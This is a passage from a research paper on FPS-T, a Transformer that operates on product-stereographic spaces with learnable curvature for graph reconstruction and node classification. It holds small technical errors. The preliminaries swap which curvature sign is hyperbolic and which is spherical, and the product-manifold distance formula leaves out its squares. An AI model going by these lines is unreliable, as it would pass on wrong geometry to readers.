constant curvature spaces can be projected to the stereographic model, with a common chart map isomorphic to the $d$-dimensional Euclidean space. Each space can efficiently embed different types of graphs (e.g., trees in hyperbolic space, lines in Euclidean space, and cycles in spherical space). In FPS-T, each layer chooses a set of curvatures that fits the input graph by changing the sign of the curvature $\kappa$ in a differentiable manner. We generalize each operation of the Transformer architecture to inputs on the product-stereographic model, all of which are end-to-end differentiable with respect to the curvatures, thereby allowing the model to jointly train embeddings as well as the underlying curvature. The resulting model, which we name as Fully Product-Stereographic Transformer (FPS-T), takes advantage of both non-Euclidean geometry and long-range interactions. We empirically show that the learnable sectional curvature of FPS-T successfully converges to the geometry of the input graph, leading to better predictive performance and parameter efficiency in graph reconstruction and node classification compared to its Euclidean counterpart. To the best of our knowledge, our work is the first to propose a natural generalization of Transformers to mixed-curvature spaces. We summarize our core contributions as follows: - We propose FPS-T, a generalization of Transformer towards operating entirely on the product-stereographic model with curvatures that are learnable in an end-to-end fashion. - For graph representation learning, we integrate FPS-T with Tokenized Graph Transformer (Kim et al., 2022), and develop a kernelized approximation of non-Euclidean attention to reduce the computational cost to linear in number of nodes and edges. - Graph reconstruction and node classification experiments on synthetic as well as real-world graphs demonstrate the benefit of generalizing Transformers to the mixed-curvature domain. 2 RELATED WORK Non-Euclidean graph representations. Non-Euclidean spaces are known to well-preserve specific types of graph structure where Euclidean space fails. Especially, non-Euclidean spaces with constant sectional curvature, e.g., hyperbolic and spherical spaces, are widely used in graph representation learning due to its tractable operations. Hyperbolic spaces are capable of efficiently embedding complex hierarchical structures in graphs (Nickel & Kiela, 2018; 2017; Ganea et al., 2018; Krioukov et al., 2010; Sala et al., 2018). Graphs with cyclic structures are well-suited for spherical spaces (Wilson et al., 2014; Grattarola et al., 2019). Riemannian manifolds with varying curvature and constant sign are also proposed for graph encoding (Cruceru et al., 2021). However, Riemannian manifolds where the sign of the curvature is fixed are not a good choice for more complex graphs that exhibit both hierarchy and cycles. Instead, the product of constant-curvature spaces (Gu et al., 2019), heterogeneous manifolds (Giovanni et al., 2022), and pseudo-Riemannian manifolds (Law & Stam, 2020) are found to be well-suited for learning representations of such complex graphs. Message passing GCNs also benefit from considering a non-Euclidean representation space. Hyperbolic GCNs are known to outperform Euclidean counterparts in various tasks on hierarchical graphs such as citation networks (Chami et al., 2019; Zhang et al., 2021; Pei et al., 2020) and molecules (Chami et al., 2019; Liu et al., 2019). Deepsphere (Defferrard et al., 2020) also adopted the spherical space to GCNs with applications such as 3D object and earth climate modeling. To take the advantage of multiple spaces, (Zhu et al., 2020b) proposed a hybrid architecture that fuses Euclidean and hyperbolic graph representations together. (Deng et al., 2023) similarly proposed modeling interactions between three constant-curvature spaces (i.e., Euclidean, hyperbolic, and spherical). To allow smooth connections between the three constant-curvature spaces, (Bachmann et al., 2020) proposed a model of constant-curvature space called the stereographic model, on which geometric operations such as distances and inner products are differentiable at all curvature values including zero. Incorporating pseudo-Riemannian manifolds with the GCN architecture also showed promising results (Xiong et al., 2022), but its performance is sensitive to the time dimension of the manifold, which requires extensive hyperparameter tuning. Overall, GCNs achieve great predictive performance in homophilic graphs where connected nodes share the same features, but they tend to fail in heterophilic graphs, as stacking up GCN layers to capture message passing between distant nodes induces oversmoothing (Oono & Suzuki, 2019; Cai & Wang, 2020) and oversquashing (Topping et al., 2021). To relieve this architectural limitation while utilizing non-Euclidean geometrical priors, we instead develop a Transformer-based graph encoder that operates on the stereographic model to learn graph representations. **Graph Transformers.** Inspired by huge success of Transformers in NLP and CV (Devlin et al., 2018; Brown et al., 2020; Dosovitskiy et al., 2020), there exist various work that extend Transformers for encoding graphs with edge connectivities that are neither sequential nor grid-like. Graph Transformer (Dwivedi & Bresson, 2020) and Spectral Attention Network (Kreuzer et al., 2021) were the first pioneers to explore this direction by replacing sinusoidal positional encodings widely used in NLP with Laplacian eigenvectors of the input graph. Graphormer (Ying et al., 2021) then proposed utilizing edge connectivities by using shortest-path distances as an attention-bias, showing state-of-the-art performance on molecular property prediction. TokenGT (Kim et al., 2022) proposed a tokenization technique that views each graph as a sequence of nodes and edges. Unlike other methods, TokenGT allows straightforward integration of engineering techniques of pure Transformers such as linearized attention (Katharopoulos et al., 2020), while enjoying theoretical expressivity that surpasses that of message-passing GCNs. However, existing graph Transformer architectures are yet confined within the Euclidean domain, making them unable to precisely embed graphs onto the feature space similarly to geometric GCNs. While Hyperbolic Attention Network (Gulcehre et al., 2018) proposed an attention mechanism that operates on hyperbolic space, its distance-based approach imposes a computational cost quadratic to the graph size and its geometry is fixed to hyperbolic. Instead, we generalize the representation space of Transformer to stereographic model, which allows us to cover more various types of graphs. We also linearize the attention mechanism on the stereographic model similar to Katharopoulos et al. (2020), which results in a model that runs in cost linear to the number of nodes and edges. ### 3 Preliminaries In this section, we introduce concepts related to our main geometrical tool, the product-stereographic model (Bachmann et al., 2020). We also discuss multi-head attention, the driving force of the Transformer architecture (Vaswani et al., 2017). #### 3.1 Product-Stereographic Model **Riemannian manifolds.** A Riemannian manifold is consisted of a smooth manifold \( M \) and a metric tensor \( g \). Each point \( x \) on the manifold \( M \) defines a tangent space \( T_xM \), which is a collection of all vectors that are tangent to \( x \), also called the tangent vector. The metric tensor \( g : M \rightarrow \mathbb{R}^{n \times n} \) assigns a positive-definite matrix to each point \( x \), which defines its inner product \( \langle \cdot , \cdot \rangle_x : T_xM \times T_xM \rightarrow \mathbb{R} \) as \( v_1^T g(x) v_2 \) where \( v_1, v_2 \in T_xM \) are the tangent vectors of \( x \). The metric tensor also defines geometrical properties and operations on the Riemannian manifold. Geodesic \( \gamma \) is the shortest curve between two points \( x, y \in M \) and its distance can be computed as \( d_M(x, y) = \int_0^1 \langle \dot{\gamma}(t), \dot{\gamma}(t) \rangle_{\gamma(t)} dt \), where \( \gamma : [0, 1] \rightarrow M \) is a unit-speed curve satisfying \( \gamma(0) = x \) and \( \gamma(1) = y \). We can move the point \( x \in M \) along a tangent vector \( v \in T_xM \) using exponential map \( \exp_x : T_xM \rightarrow M \) which is defined as \( \exp_x(v) = \gamma(1) \) where \( \gamma \) is a geodesic and \( \gamma(0) = x, \gamma'(0) = v \). The logarithmic map \( \log_x : M \rightarrow T_xM \) is the inverse of \( \exp_x \). A tangent vector \( v \in T_xM \) can be transferred along a geodesic from \( x \) to \( y \) using parallel transport \( P_{T_xM \rightarrow T_yM} : T_xM \rightarrow T_yM \). Note that the product of Riemannian manifolds is also a Riemannian manifold. A point on the product Riemannian manifold \( x \in \otimes_{i=1}^{n} M_i \) is consisted of points from each component manifold \( M_i \) as \( x = \|_{i=1}^{n} x_i \), where \( x_i \in M_i \) and \( \| \) denotes concatenation. The distance between \( x, y \in \otimes_{i=1}^{n} M_i \) is calculated as \( \sqrt{\sum_{i=1}^{n} d_{M_i}(x_i, y_i)} \). Exponential/logarithmic maps and parallel transports are applied in a manifold-wise fashion (e.g., \( \exp_x(v) = \|_{i=1}^{n} \exp_{x_i}(v_i) \) with \( v = \|_{i=1}^{n} v_i \) and \( v_i \in T_{x_i} M_i \)). **Constant-curvature spaces.** Curvature is an important geometrical property used to characterize Riemannian manifolds. One widely-used curvature to explain Riemannian manifolds is the sectional curvature: given two linearly independent tangent vector fields \( U, V \in \mathfrak{X}(M) \), the sectional curvature \( K(U, V) \) is computed as \( K(U, V) = \frac{\langle R(U,V)V,U \rangle}{\langle U,U \rangle \langle V,V \rangle - \langle U,V \rangle^2} \), where \( R(\cdot, \cdot) : \mathfrak{X}(M) \times \mathfrak{X}(M) \times \mathfrak{X}(M) \to \mathfrak{X}(M) \) is a Riemannian curvature tensor. The sectional curvature measures the divergence between geodesics starting with the tangent vector fields \( U, V \) for each point of the manifold. With positive or negative sectional curvatures, geodesics become closer or farther than with zero curvature. Throughout this paper, we refer to a space of a constant sectional curvature as a **constant-curvature space**. For example, the Euclidean space \( \mathbb{E} \) is the special case of the constant-curvature space with zero curvature. When positive or negative, we call the corresponding spaces to be hyperbolic \( \mathbb{H} \) or spherical \( \mathbb{S} \). **Stereographic models.** A \( d \)-dimensional stereographic model \( \text{st}_d^\kappa \) is a constant-curvature space with curvature \( \kappa \in \mathbb{R} \). One attractive property of the stereographic model is that the operations such as distance, exp/log-map, and parallel transport are differentiable at any curvature value \( \kappa \), including \( \kappa = 0 \). This enables the stereographic model to learn the curvature value \( \kappa \) without any constraint. The manifold of the stereographic model \( \text{st}_d^\kappa \) is \( \{ x \in \mathbb{R}^d | -\kappa \|x\|^2 < 1 \} \). The metric tensor is defined as \( g^\kappa(x) = \frac{4}{1 + \kappa \|x\|^2} I = (\lambda_\kappa^x)^2 I \), where \( \lambda_\kappa^x \) is known as the conformal factor. The mobius addition between two points \( x, y \in \text{st}_d^\kappa \) is computed as \( x \oplus_\kappa y = \frac{(1-2\kappa x^T y-\kappa \|y\|^2)x+(1+\kappa \|x\|^2)y}{1-2\kappa x^T y+\kappa^2 \|x\|^2 \|y\|^2} \). Based on mobius addition, we can derive other geometric operations as Table 3 in Appendix A. The table also shows that when \( \kappa \) converges to zero, the operations become equivalent to Euclidean space operations, so the stereographic model essentially recovers Euclidean geometry. ### 3.2 Multi-Head Attention In vanilla Transformer (Vaswani et al., 2017), each block consists of multiple attention heads, each taking a sequence of token embeddings \( X \in \mathbb{R}^{n \times d} \) with sequence length \( n \) and feature dimension \( d \) as input. Three linear layers \( W^Q, W^K, W^V \in \mathbb{R}^{d \times d'} \) first map each token embedding into queries \( Q \), keys \( K \), and values \( V \) with head-dimension \( d' \), respectively. Then, the attention score matrix is computed by scaled Euclidean dot-product between \( Q \) and \( K \), followed by row-wise softmax activation \( \sigma(\cdot) \). The attention score matrix is then multiplied to value \( V \), returning contextualized token embeddings. The overall procedure can be written as \[ Q = XW^Q, \quad K = XW^K, \quad V = XW^V, \quad \text{Attn}(X) = \sigma \left( \frac{QK^T}{\sqrt{d'}} \right) V. \tag{1} \] The output from multiple attention heads are concatenated together, then processed through a feed-forward layer before proceeding to the next Transformer block. ### 4 Fully Product-Stereographic Transformer Here, we describe the inner wirings of our proposed method. We generalize each operation in Transformer to the product-stereographic model, together forming a geometric Transformer architecture that operates entirely within the stereographic model. #### 4.1 Stereographic Neural Networks We first introduce the stereographic analogies of the Euclidean neural networks such as the linear layer, activation, layer normalization, and logit functions. We denote the product-stereographic model \( \otimes_{i=1}^{H} \text{st}_{d_i}^{\kappa_i} \) as \( \text{st}_d^{\otimes \kappa} \), where \( \kappa = (\kappa_1, \ldots, \kappa_H) \) is the ordered set of curvatures of \( d \)-dimensional component spaces within a Transformer block with \( H \) attention heads. We also use the superscript \( \otimes \kappa \) to denote Riemannian operations on product-stereographic model that decompose representations into equal parts, apply the operation, then concatenate back to the product space (e.g., if \( v = [v_1, \ldots, v_H] \), then \( \exp_0^{\otimes \kappa}(v) := \|_{i=1}^{H} \exp_0^{\kappa_i}(v_i) \)). Figure 2: Illustration of our attention mechanism on the non-Euclidean space. FPS-T considers each value-vector as a point that resides on the stereographic model, and query/key-vectors as tangent vectors on the corresponding tangent spaces. All query/key-vectors are parallel-transported to the origin prior to dot-product attention, thereby taking the given geometry into account. **Stereographic linear layer, activation, and layer normalization.** Given a Euclidean neural network \( f \), we can define its stereographic counterpart as \( \exp_{\kappa}^{\otimes} (f(\log_{\kappa}^{\otimes}(X))) \). The stereographic linear layer \( \text{Linear}_{\kappa}(X; W) \) is thus defined by setting \( f \) as the Euclidean linear layer \( f(X; W) = XW \). The same approach can be used for any Euclidean activation function \( f_{\text{act}} \) (e.g., ReLU, Tanh, ELU, and Sigmoid), from which we obtain stereographic activation functions. Stereographic layer normalization \( \text{LN}_{\kappa} \) is defined in the same manner. **Stereographic logits.** Suppose that \( x \in \mathfrak{st}_d^\kappa \) is a stereographic embedding retrieved from the last transformer layer. For prediction tasks such as node classification, we need to compute the probability that the node with embedding \( x \) belongs to class \( c \). Inspired by logistic regression in Euclidean spaces, Bachmann et al. (2020) proposes its stereographic variant as \[ p(y = c | x) \propto \exp \left( \text{sign}(\langle -p_c \oplus_\kappa x, a_c \rangle) \|a_c\|_p d_\kappa(x, H_{a_c, p_c}) \right), \] where \( H_{a_c, p_c} = \{ x \in \mathfrak{st}_d^\kappa | \langle -p_c \oplus_\kappa x, a_c \rangle = 0 \} \) is a hyperplane formed by \( a_c \in T_p \mathfrak{st}_d^\kappa \) and \( p_c \in \mathfrak{st}_d^\kappa \). For stereographic model \( \mathfrak{st}_d^\kappa \), the distance between \( x \in \mathfrak{st}_d^\kappa \) and hyperplane \( H_{a, p} \) equals \[ d_\kappa(x, H_{a, p}) = \sin^{-1}_\kappa \left( \frac{2|\langle -p \oplus_\kappa x, a \rangle|}{(1 + \kappa \|(-p \oplus_\kappa x, a)\|^2)\|a\|} \right). \] This distance function can be easily extended to the product-stereographic model as mentioned in Section 3.1, and parameters \( a, p \) that define the hyperplane are learnable during training. ### 4.2 STEREOGRAPHIC MULTI-HEAD ATTENTION Using the stereographic operations above, we propose a multi-head attention mechanism under product-stereographic models. The key intuition is that each \( h \)-th attention head operates on the \( \kappa_h \)-stereographic space. Given a sequence of \( n \) product-stereographic embeddings \( X \in \mathfrak{st}_n^\kappa \times d' \), the attention head with curvature \( \kappa \) first obtains values using the stereographic linear layer. For queries and keys, it maps each stereographic embedding to the tangent space of the values as: \[ Q = XW_Q \in T_V \mathfrak{st}_n^\kappa \times d', \quad K = XW_K \in T_V \mathfrak{st}_n^\kappa \times d', \quad V = \text{Linear}_\kappa(X; W_V) \in \mathfrak{st}_n^\kappa \times d', \] where \( W_Q, W_K \in \mathbb{R}^{d \times d'} \) are the query/key weight matrices, and \( W_V \in \mathbb{R}^{d \times d'} \) is the weight matrix for values. Then, the attention score between the \( i \)-th query \( Q_i \) and \( j \)-th key \( K_j \) is computed by parallel-transporting the vectors to the origin, and taking the inner product at the origin as \[ \alpha_{ij} = \langle \text{PT}_{V_i \to 0}(Q_i), \text{PT}_{V_j \to 0}(K_j) \rangle_0. \] Figure 2 illustrates our geometric attention mechanism. Because the metric tensor of the origin of the stereographic model is simply \( 4I \) with identity matrix \( I \), the Riemannian inner product becomes equivalent to the Euclidean inner product at the origin. Finally, we aggregate values based on the attention scores using the Einstein midpoint: \[ \text{Aggregate}_\kappa(V, \alpha)_i := \frac{1}{2} \otimes_\kappa \left( \sum_{j=1}^n \frac{\alpha_{ij} \lambda_{V_j}^\kappa}{\sum_{k=1}^n \alpha_{ik} (\lambda_{V_k}^\kappa - 1)} V_j \right), \] with conformal factor \( \lambda_{V_i}^\kappa \) at point \( V_i \in \mathfrak{st}_n^\kappa \). By concatenating the aggregated results from each attention head, the final outcome of product-stereographic multi-head attention is \[ \text{MHA}_{\otimes \kappa}(X) = [\otimes_{h=1}^H \text{Aggregate}_{\kappa_h}(V^h, \alpha^h)] \in \otimes_{h=1}^H \mathfrak{st}_n^\kappa \times d, \] where \( \kappa_h \) denotes the curvature of the \( h \)-th attention head. 4.3 Wrap-up For completeness, we fill in the gap on how intermediate steps such as skip-connection are generalized towards non-zero curvatures, and how representations are processed between Transformer layers with distinct curvatures. First, recall that vanilla Transformer utilizes residual connections and Layer normalization to mitigate vanishing gradients and induce better convergence (Vaswani et al., 2017). To apply these operations on representations in the product-stereographic space, we switch to \[ X_l = \text{MHA}_{\kappa}(\text{LN}_{\kappa}(X_{l}^{\text{in}})) \oplus_{\kappa} X_{l}^{\text{in}}, \quad X_{l}^{\text{out}} = \text{FFN}_{\kappa}(\text{LN}_{\kappa}(X_{l})) \oplus_{\kappa} X_{l}. \] (8) Note that while each attention head in stereographic multi-head attention operates on each stereographic model independently, the product-stereographic feed-forward network FFN$_{\kappa}$, for which we use two stereographic linear layers with an activation in between, fuses representations from distinct geometries and performs interactions between different stereographic models similarly to previous work (Zhu et al., 2020b; Deng et al., 2023). Furthermore, note that each $l$-th Transformer layer operates on a distinct product-stereographic space $\text{st}_{d \otimes \kappa^l}$ where $\kappa^l = (\kappa_1^l, \ldots, \kappa_H^l)$ together forms the geometric signature of the layer. For consistency, we assume that the input embeddings are on the product-stereographic model of the first layer (i.e., $\text{st}_{d \otimes \kappa^1}$). In case of classification tasks where logits are computed, the product-stereographic logit layer operates on the last set of curvatures (i.e., $\text{st}_{d \otimes \kappa^L}$ where $L$ denotes the number of Transformer layers). In between layers, representations are translated from $\text{st}_{d \otimes \kappa^l}$ to $\text{st}_{d \otimes \kappa^{l+1}}$ by assuming a shared tangent space at the origin (i.e., $X_{l+1}^{\text{in}} = (\exp_{0}^{\otimes \kappa^{l+1}} \circ \log_{0}^{\otimes \kappa^l})(X_{l}^{\text{out}})$). Altogether, it is straightforward to find that FPS-T becomes equivalent to the original Transformer as all $\kappa$ approaches 0, yet it possesses the capability to deviate itself away from Euclidean geometry given it leads to better optimization. For all experiments, we initialize all curvatures as zero to demonstrate the practicality of our method by not requiring additional hyperparameter tuning over different curvature combinations. 4.4 Extension to Graph Transformer To learn graph-structured data with FPS-T, we borrow the tokenization technique used by TOKENGT (Kim et al., 2022). Let $G = (V, E)$ be a graph with $N$ nodes in node-set $V$, $M$ edges in edge-set $E$, and respective features $X_V \in \mathbb{R}^{N \times d}$, $X_E \in \mathbb{R}^{M \times d}$. Then, we tokenize $G$ into a sequence $X = [X_V, X_E] \in \mathbb{R}^{(N+M) \times d}$ by treating each node and edge as an independent token, and augment the tokens with 1) node identifiers that serve as positional encoding and 2) type identifiers that allow the model to distinguish between node- and edge-tokens. TOKENGT feeds this sequence into vanilla Transformer, an approach proven to pass the 2-dimensional Weisfeiler-Lehman (2-WL) graph isomorphism test and surpass the theoretical expressivity of message-passing GNNs (Kim et al., 2022; Maron et al., 2019). More details on the tokenization procedure can be found in Appendix B. In our work, we encode the input sequence through FPS-T instead, such that nodes and edges exchange information globally on the product-stereographic space. As augmented feature vectors $X$ are initially Euclidean, we assume each token lies within the tangent space at the origin of the product-stereographic model of the first layer $T_0 \text{st}_{d \otimes \kappa^1} \cong \mathbb{R}^{H \times d}$, where $|\kappa^1| = H$ and $Hd = d$. Therefore, we apply exponential mapping on the tokens to place them on the product-stereographic model via $\exp_{0}^{\otimes \kappa^1}(X)$, the output of which is forwarded through FPS-T. 4.5 Cost Linearization of Stereographic Attention One drawback of the graph tokenization method above is that its computational cost becomes intractable when encoding large graphs. As computing the attention score matrix takes time and memory quadratic to the sequence length, a graph with $N$ nodes and $M$ edges incurs an asymptotic cost of $O((N + M)^2)$, which can be $O(N^4)$ for dense graphs. Fortunately, there exist various advancements used to make Transformers more efficient (Tay et al., 2022; Kitaev et al., 2020; Choromanski et al., 2020; Wang et al., 2020; Xiong et al., 2021; Cho et al., 2022). In linearized attention (Katharopoulos et al., 2020), it is shown that the Euclidean attention score $\langle Q_i, K_j \rangle$ can be approximated with the product of kernel function $\phi(Q_i)\phi(K_j)^T$, where $\phi(X) = \text{ELU}(X) + 1$. For stereographic attention (Equation 5), computing dot-products on the tangent space of the origin allows us to extend this kernelization to FPS-T. Let $\hat{Q}_i = \text{PT}_{V_i \rightarrow o}(Q_i)$ and $\hat{K}_j = \text{PT}_{V_j \rightarrow o}(K_j)$ be the tangent vectors on the origin prior to taking the dot-product. By applying Table 1: Synthetic graph reconstruction results in average distortion (lower is better). The best FPS-T configuration and its learned curvatures are well-aligned to the geometry of the input graph. | Model | Space | TREE | SPHERE | TORUS | RING OF TREES | |----------------|-------------|----------|----------|----------|---------------| | TOKENGT | $\mathbb{E}^{10}$ | 0.04363 | 0.04023 | 0.07172 | 0.05553 | | | $\mathbb{S}^5 \times \mathbb{E}^5$ | 0.04357 | 0.04139 | 0.07167 | 0.05546 | | FPS-T (ours) | $\mathfrak{s}\mathfrak{l}_{\kappa_1}^{10}$ | **0.00072** | **0.02176** | **0.06415** | **0.03393** | | | $\mathfrak{s}\mathfrak{l}_{\kappa_1}^5 \times \mathfrak{s}\mathfrak{l}_{\kappa_2}^5$ | 0.00105 | 0.02206 | **0.06135** | **0.01630** | | Best FPS-T curvatures | | (-1.219) | (+0.0629) | (+1.308, +0.2153) | (+0.3241, -3.314) | Figure 3: Illustration of geometric graphs used in our synthetic graph reconstruction experiment. (a) TREE (b) SPHERE (c) TORUS (d) RING OF TREES Kernelization to stereographic attention, we can rewrite the stereographic aggregation (Equation 6) as $$ \frac{1}{2} \otimes_{\kappa} \left( \sum_{j=1}^{n} \frac{\langle \tilde{Q}_i, \tilde{K}_j \rangle_0 \lambda_{V_j}^{\kappa}}{\sum_{k=1}^{n} \langle \tilde{Q}_i, \tilde{K}_k \rangle_0 (\lambda_{V_k}^{\kappa} - 1)} V_j \right) \approx \frac{1}{2} \otimes_{\kappa} \left[ \phi(\tilde{Q}) \left( \phi'(\tilde{K})^T \tilde{V} \right) \right]_i $$ where $\phi'(K)_i = \phi(K)_i (\lambda_{V_i}^{\kappa} - 1)$ and $\tilde{V}_i = \frac{\lambda_{V_i}^{\kappa}}{\lambda_{V_i}^{\kappa} - 1} V_i$. This approximation enables FPS-T to encode graphs with $O(N + M)$ cost, matching the complexity of message-passing GCNs (Wu et al., 2020) while taking the non-Euclidean geometry into account. In Appendix C, we empirically verify this asymptotic cost and also find that the additional cost of Riemannian operations in FPS-T are mostly dominated by pre-existing Transformer operations when encoding large networks. In the upcoming experiments, we use the kernelized approach for FPS-T and find that the approximation performs well in practice. 5 EXPERIMENTS We first evaluate FPS-T on synthetic geometric graph reconstruction (e.g. tree or spherical graph) to verify whether our approach learns curvatures that best fit the input graph. We also benchmark existing graph reconstruction and node classification datasets to empirically demonstrate the benefit of capturing long-range interactions under mixed-curvature spaces in real-world settings. 5.1 GRAPH RECONSTRUCTION Datasets. For synthetic graph reconstruction, we generate four types of graphs where the suitable geometry is known a priori — TREES ($\mathbb{H}$), SPHERE ($\mathbb{S}$), TORUS ($\mathbb{S} \times \mathbb{S}$), and RING OF TREES ($\mathbb{S} \times \mathbb{H}$). An example illustration of the synthetic graphs can be found in Figure 3. We then evaluate FPS-T on four real-world networks: WEB-EDU (Gleich et al., 2004) is a web-page network under the .edu domain connected with hyperlinks; POWER (Watts & Strogatz, 1998) is a network that models the electrical power grid in western US; BIO-WORM (Cho et al., 2014) is a genetics network of the C. elegans worm; FACEBOOK (Leskovec & Mcauley, 2012) is a social network. Further details on the datasets such as sectional curvature statistics of the networks can be found in Appendix D. Training. The goal of graph reconstruction is to learn continuous node representations of the given graph that preserve the edge connectivity structure through distances in the feature space. Let $h_u$ denote the encoded representation of node $u \in V$ given a graph $G = (V, E)$. For synthetic graph reconstruction, we train FPS-T and TOKENGT by minimizing the graph distortion (Gu et al., 2019): $$ L(h, G) = \sum_{(u,v) \in V \times V, u \neq v} \left( \frac{d(h_u, h_v)}{d_G(u, v)} \right)^2 - 1 $$ where $d(h_u, h_v)$ denote the distance between $h_u$ and $h_v$ on the representation space, and $d_G(u, v)$ equals the shortest path distance between nodes $u$ and $v$ on graph $G$. Both methods use a single layer with 1 or 2 attention heads with a combined latent dimension of 10. | Dataset | WEB-EDU | POWER | FACEBOOK | BIO-WORM | |---------|---------|-------|----------|----------| | Avg. Curvature | -0.63 | -0.28 | -0.08 | -0.03 | | MLP | 83.24±1.32 | 83.89±4.02 | 50.64±15.12 | 73.34±20.85 | | GCN | 79.95±0.23 | 98.25±0.02 | 78.99±0.29 | 93.32±1.06 | | GAT | 88.86±0.36 | 99.03±0.01 | 82.81±0.25 | 97.76±0.03 | | SAGE | 86.34±0.31 | 97.58±0.14 | 81.01±0.26 | 96.86±0.06 | | SGC | 78.78±0.12 | 97.69±0.05 | 74.69±0.36 | 89.73±0.59 | | TOKENGT | 89.45±0.06 | 99.10±0.00 | 84.71±0.02 | 97.82±0.02 | | HGCN | 80.13±0.31 | 96.82±0.08 | 74.35±5.39 | 86.96±0.30 | | HGNN | 83.64±0.26 | 97.85±0.05 | 78.74±0.58 | 90.97±1.06 | | HAT | 90.21±0.36 | 93.86±0.34 | 80.09±0.20 | 93.58±0.42 | | \( \kappa \)-GCN | 55.34±35.88 | 98.23±0.09 | 20.80±20.69 | 84.16±13.67 | | \( Q \)-GCN | 80.34±0.07 | 97.87±0.01 | 76.33±0.01 | 96.15±0.01 | | FPS-T | 99.10±0.01 | 99.32±0.01 | 86.16±0.10 | 98.19±0.03 | Figure 4: **Left:** Real-world graph reconstruction results. We run each method under 5 random seeds and report the average mAP with 95% confidence intervals. **Right:** Test mAP (Y-axis) of FPS-T and TOKENGT on WEB-EDU with decreasing model size (X-axis; by decreasing the latent dimension). Using mixed-curvature spaces can be more parameter efficient in preserving graph structures. For real-world graph reconstruction, we instead minimize a loss function that aims for preserving the local connections as computing the all-pairwise shortest path distances becomes computationally intractable with large networks: \[ L(h, G) = \sum_{(u,v) \in E} \log \frac{e^{-d(h_u,h_v)}}{\sum_{v' \in E(u)} e^{-d(h_u,h_{v'})}} \] Here, \( E(u) \) denotes the set of non-neighbors of node \( u \). In addition to TOKENGT, we also compare FPS-T against baselines including Euclidean (GCN (Kipf & Welling, 2016), GAT (Veličković et al., 2017), SAGE (Hamilton et al., 2017), SGC (Wu et al., 2019)), hyperbolic (HGCN (Chami et al., 2019), HGNN (Liu et al., 2019), HAT (Zhang et al., 2021)), and mixed-curvature (\( \kappa \)-GCN (Bachmann et al., 2020), \( Q \)-GCN (Xiong et al., 2022)) message passing-based GCNs. For fair comparison, we set the number of layers to one and latent dimension to 16 for all models. We train all models for 10k epochs using an Adam optimizer with learning rate \( 1e^{-2} \). The node features are given as one-hot encodings with additional random noise following Xiong et al. (2022). We defer details on the choice of hyperparameters of baseline methods to Appendix E. **Results.** Table 1 reports the synthetic graph reconstruction results in average graph distortion as well as curvatures learned by FPS-T. As expected, FPS-T consistently outperforms its Euclidean counterpart on all four networks due to the networks exhibiting highly non-Euclidean structures. Despite being initialized at zero, the learnable curvatures in FPS-T converge towards curvatures that intuitively match with the input graph: for RING OF TREES, FPS-T with two attention heads converge towards one positive and one negative curvature, outperforming the single-head variant. Next, the left table in Figure 4 shows the average sectional curvature of each real-world network and corresponding graph reconstruction results in mean average-precision (mAP) which measures the average ratio of nearest points that are actual neighbors of each node. We find that FPS-T shows significant performance gains on all four networks when compared to all baselines including Euclidean TOKENGT. Specifically, FPS-T shows a 10.5% gain in mAP against TOKENGT on WEB-EDU with an average sectional curvature of -0.63, showing that performing attention on the non-Euclidean product-stereographic space is especially effective when encoding graphs containing many non-zero sectional curvatures. Note that non-Euclidean spaces are theoretically known to well-embed complex structures in low dimensions, while Euclidean spaces require a large number of dimensions to attain reasonable precision (Sala et al., 2018). Based on this observation, we test whether FPS-T enjoys better parameter efficiency compared to TOKENGT by training two models with decreasing latent dimensions in \{16, 12, 8, 4\}. In the right plot of Figure 4, we report the mAP score of TOKENGT and FPS-T on the WEB-EDU network after training with decreasing number of parameters. We observe that our approach of incorporating mixed-curvature spaces consistently obtains low distortion embeddings in a more parameter-efficient manner, outperforming TOKENGT with \( d = 16 \) using half its model size. Table 2: Node classification results. We run each method under 10 different random seeds and report the average F1 scores with 95% confidence intervals and average rankings across all datasets. | Dataset | TEXAS | CORNELL | WISCONSIN | ACTOR | AIRPORT | CITESEER | PUBMED | CORA | Avg. Rank | |---------|-------|---------|-----------|-------|---------|----------|--------|------|-----------| | H(G) | 0.11 | 0.13 | 0.20 | 0.22 | 0.72 | 0.74 | 0.80 | 0.81 | | | MLP | 70.54±3.00 | 58.38±4.04 | 81.20±1.87 | 33.62±0.55 | 54.05±1.78 | 52.58±1.97 | 67.17±0.91 | 52.44±1.08 | 8.25 | | GCN | 57.84±1.62 | 47.84±1.77 | 45.40±2.62 | 27.09±0.36 | 92.00±0.63 | 71.38±0.43 | 78.37±0.26 | 80.40±0.53 | 7.38 | | GAT | 59.46±1.12 | 55.14±1.80 | 46.20±2.30 | 27.43±0.23 | 92.35±0.36 | 71.70±0.29 | 78.14±0.31 | 82.29±0.46 | 6.13 | | SAGE | 68.38±3.54 | 70.54±2.01 | 78.40±0.52 | 36.87±0.50 | 93.21±0.57 | 70.58±0.42 | 77.31±0.59 | 78.88±0.87 | 5.13 | | SGC | 57.57±2.96 | 52.97±2.87 | 46.40±2.01 | 27.14±0.46 | 90.48±1.01 | 72.11±0.38 | 75.11±1.27 | 79.68±0.65 | 8.25 | | TOKENGT | 88.65±2.06 | 71.62±2.13 | 83.00±0.65 | 36.59±0.89 | 95.90±0.39 | 71.23±0.51 | 78.93±0.27 | 81.42±0.79 | 2.50 | | HGNN | 54.59±3.93 | 55.68±1.80 | 55.60±2.53 | 28.89±0.16 | 92.47±0.63 | 69.92±0.60 | 75.67±0.99 | 80.00±0.85 | 7.00 | | HAT | 50.81±3.60 | 52.70±1.42 | 54.60±2.68 | 29.09±0.19 | 90.55±0.71 | 69.82±0.53 | 76.72±0.86 | 79.30±0.51 | 8.75 | | κ-GCN | 82.16±2.52 | 70.54±1.67 | 81.80±1.36 | 38.34±0.26 | 92.88±0.57 | 68.14±0.53 | 77.50±0.42 | 79.81±0.58 | 4.38 | | Q-GCN | 56.22±4.38 | 55.68±5.59 | 46.60±2.41 | 26.39±0.60 | 82.58±3.70 | 54.06±4.45 | 68.61±3.05 | 73.70±0.69 | 10.3 | | FPS-T | 51.35±3.44 | 55.95±2.85 | 52.80±2.20 | 28.18±0.55 | 91.39±1.05 | 66.15±0.45 | 77.13±0.59 | 79.63±0.57 | 8.25 | 5.2 NODE CLASSIFICATION Datasets. For node classification we experiment on eight different networks: three WebKB networks (TEXAS, CORNELL, WISCONSIN) that connect web-pages via hyperlinks (Craven et al., 1998), a co-occurrence network from Wikipedia pages related to English films (ACTOR) (Tang et al., 2009), three citation networks (CITESEER, PUBMED, CORA) (Sen et al., 2008), and an airline network (AIRPORT) (Chami et al., 2019). These networks are chosen to test our approach under a wide spectrum of graph homophily $H(G)$, which measures the ratio of edges that connect nodes that share the same label 